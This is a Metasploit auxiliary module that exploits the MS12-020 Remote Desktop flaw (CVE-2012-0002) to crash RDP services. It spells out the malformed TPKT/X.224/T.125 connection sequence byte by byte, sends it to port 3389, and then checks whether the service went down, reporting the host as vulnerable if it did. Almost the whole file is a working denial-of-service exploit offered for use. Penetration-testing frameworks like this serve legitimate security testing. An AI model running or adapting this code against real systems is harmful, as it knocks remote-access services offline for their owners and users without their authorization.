##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
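# Auxiliary DoS module for MS12-020 (CVE-2012-0002).
#
# Sends a hand-built TPKT/X.224/T.125 connection sequence to an RDP listener
# and then re-probes the port to decide whether the service went away.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',
        'Description' => %q{
          This module exploits the MS12-020 RDP vulnerability originally discovered and
          reported by Luigi Auriemma. The flaw can be found in the way the T.125
          ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result
          an invalid pointer being used, therefore causing a denial-of-service condition.
        },
        'References' => [
          [ 'CVE', '2012-0002' ],
          [ 'MSB', 'MS12-020' ],
          [ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],
          [ 'URL', 'http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],
          [ 'URL', 'http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg' ],
          [ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],
          [ 'EDB', '18606' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]
        ],
        'Author' => [
          'Luigi Auriemma',
          'Daniel Godas-Lopez', # Entirely based on Daniel's pastie
          'Alex Ionescu',
          'jduck',
          '#ms12-020' # Freenode IRC
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2012-03-16',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(3389)
      ]
    )
  end

  # Probe whether RHOST:RPORT accepts a TCP connection.
  #
  # Only TCP reachability is tested; no RDP handshake is performed, so any
  # listener on the port counts as "up".
  #
  # @return [Boolean] true if connect succeeded, false on any Rex connection
  #   failure (refused, timeout, host unreachable, proxy error, ...)
  def is_rdp_up
    connect
    disconnect
    true
  rescue Rex::ConnectionError
    # Rex::ConnectionRefused and Rex::ConnectionTimeout are subclasses of this;
    # rescuing the parent also turns host-unreachable / proxy failures into
    # "not up" instead of aborting the module with an unhandled exception.
    false
  end

  # Deliver the DoS sequence and report the outcome.
  #
  # The verdict is a heuristic based on TCP reachability only: "seems down"
  # means a connect to the port failed about 3 seconds after the payload, which
  # a transient network problem could also cause; "still up" means the payload
  # had no visible effect, which is what a patched host looks like.
  def run
    max_channel_ids = "\x02\x01\xff"

    # One T.125 DomainParameters set; Connect-Initial carries it three times
    # (target / minimum / maximum), so build it once.
    domain_params =
      max_channel_ids + # maxChannelIds
      "\x02\x01\xFF" + # maxUserIds
      "\x02\x01\x00" + # maxTokenIds
      "\x02\x01\x01" + # numPriorities
      "\x02\x01\x00" + # minThroughput
      "\x02\x01\x01" + # maxHeight
      "\x02\x02\x00\x7C" + # maxMCSPDUsize
      "\x02\x01\x02" # protocolVersion

    conn_req =
      "\x03\x00\x00\x13" + # TPKT: version + length
      "\x0E\xE0\x00\x00" + # X.224 (connection request)
      "\x00\x00\x00\x01" +
      "\x00\x08\x00\x00" +
      "\x00\x00\x00"

    connect_initial =
      "\x03\x00\x00\x6A" + # TPKT: version + length
      "\x02\xF0\x80" + # X.224 (connect-initial)
      "\x7F\x65\x82\x00" + # T.125
      "\x5E" +
      "\x04\x01\x01" + # callingDomainSelector
      "\x04\x01\x01" + # calledDomainSelector
      "\x01\x01\xFF" + # upwardFlag
      "\x30\x19" + # targetParameters
      domain_params +
      "\x30\x19" + # minimumParameters
      domain_params +
      "\x30\x19" + # maximumParameters
      domain_params +
      "\x04\x82\x00\x00" # userData

    # Short T.125 PDU (tag 0x28); the original PoC sends eight of them.
    pdu_28 =
      "\x03\x00\x00\x08" + # TPKT: version + length
      "\x02\xF0\x80" + # X.224
      "\x28" # T.125

    tail =
      "\x03\x00\x00\x0C" + # TPKT: version + length
      "\x02\xF0\x80" + # X.224
      "\x38\x00\x06\x03" + # T.125
      "\xF0" +
      "\x03\x00\x00\x09" + # TPKT: version + length
      "\x02\xF0\x80" + # X.224
      "\x21\x80" # T.125

    pkt = conn_req + connect_initial + (pdu_28 * 8) + tail

    unless is_rdp_up
      print_error("#{rhost}:#{rport} - RDP Service Unreachable")
      return
    end

    connect
    print_status("#{rhost}:#{rport} - Sending #{name}")
    sock.put(pkt)
    # Give the target time to process the sequence (and fall over) before probing.
    Rex.sleep(3)
    disconnect
    # bytesize, not length: the payload is raw bytes, not characters.
    print_status("#{rhost}:#{rport} - #{pkt.bytesize} bytes sent")

    print_status("#{rhost}:#{rport} - Checking RDP status...")

    if is_rdp_up
      # A successful connect here means the service survived the payload, so
      # the message must say "still up", not "unreachable".
      print_error("#{rhost}:#{rport} - RDP Service still up after DoS attempt; target may be patched")
      return
    end

    print_good("#{rhost}:#{rport} seems down")
    report_vuln({
      host: rhost,
      port: rport,
      name: name,
      refs: references,
      info: "Module #{fullname} successfully crashed the target system via RDP"
    })
  end
end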